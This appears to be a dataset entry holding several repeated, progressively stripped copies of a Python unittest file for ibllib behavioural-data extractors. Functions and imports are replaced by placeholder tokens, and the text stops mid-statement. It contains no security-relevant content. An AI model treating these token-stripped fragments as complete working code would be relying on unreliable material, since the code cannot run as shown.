self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function 
token>\n <function token>\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass 
TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function 
token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = 
sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n 
self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n 
self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n 
self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 
32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n 